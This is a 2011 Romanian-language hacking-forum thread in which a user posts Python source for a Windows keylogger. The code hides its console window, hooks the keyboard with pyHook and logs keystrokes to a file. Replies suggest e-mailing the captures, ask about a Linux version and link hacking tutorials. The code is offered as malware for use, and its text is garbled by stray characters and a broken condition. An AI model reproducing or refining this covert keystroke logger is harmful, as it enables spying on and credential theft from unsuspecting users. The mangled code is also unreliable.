ZeroDark Posted February 15, 2011 Report Posted February 15, 2011 Sper ca am postat bn daca nu rog sa se mute KEYLOGGER SOURCECODE AND- Download Python:Python Programming Language – Official Website- Download Pyhook: pyhook.sourceforge.net- Download Python for Windows Extensions: Python for Windows extensions | Download Python for Windows extensions software for free at SourceForge.netSOURCE:import win32apiimport win32consoleimport win32guiimport pythoncom, pyHookwin = win32console.GetConsoleWindow()win32gui.ShowWindow(win,0)def OnKeyboardEvent(event):   if event.Ascii==5:      Â_exit(1)   if event.Ascii != 0 or 8:       f=open('c:output.txt','r')      Âbuffer=f.read()       f.close()      Âf=open('c:output.txt','w')       keylogs=chr(event.Ascii)      Âif event.Ascii==13:           keylogs='/n'       buffer +=keylogs       f.write(buffer)       f.close()hm = pyHook.HookManager()hm.KeyDown = OnKeyboardEventhm.HookKeyboard()pythoncom.PumpMessages() Quote
mike_vio Posted February 15, 2011 Report Posted February 15, 2011 Si fisierul ala .py nu iti trebuie instalat python-ul in calculator ca sa-l rulezi ? Fara un interpretor instalat nu poti sa-l rulezi. Quote
cmiN Posted February 15, 2011 Report Posted February 15, 2011 Alea-s caractere >128 sau ce de nu le arata ? A-urile alea sunt cele mai importante . Quote
l3asketballplayer Posted February 15, 2011 Report Posted February 15, 2011 (edited) Ar fi foarte fain daca ar fi ceva de genu' si pentru linux Ce e cu Â-urile alea ?Cred ca ar fii mai fain daca nu ar scrie in fisier text ci ar trimite pe mail Edited February 15, 2011 by l3asketballplayer Quote
cmiN Posted February 15, 2011 Report Posted February 15, 2011 Cred ca merge si doar cu pyHook si pe unix, toata faza la el este ca deschide o fereastra, aplicatie GUI ascunsa / in background care capteaza in paralel ceea ce tastezi si de fiecare data cand apesi ceva noteaza si scrie intr-un text. Scopul este intelegerea conceptului de aici in colo personalizezi tu cum si unde sa trimita capturile. Quote
mike_vio Posted February 16, 2011 Report Posted February 16, 2011 Daca il vreti complet + tutorial cautati "tinkernut" - are mai multe gagiul. Quote
ZeroDark Posted February 16, 2011 Author Report Posted February 16, 2011 Tinkernut.com|Watch. Learn. Sharesi aici ceva hack xDTinkernut.com|Archive|HacksNu fac reclama Quote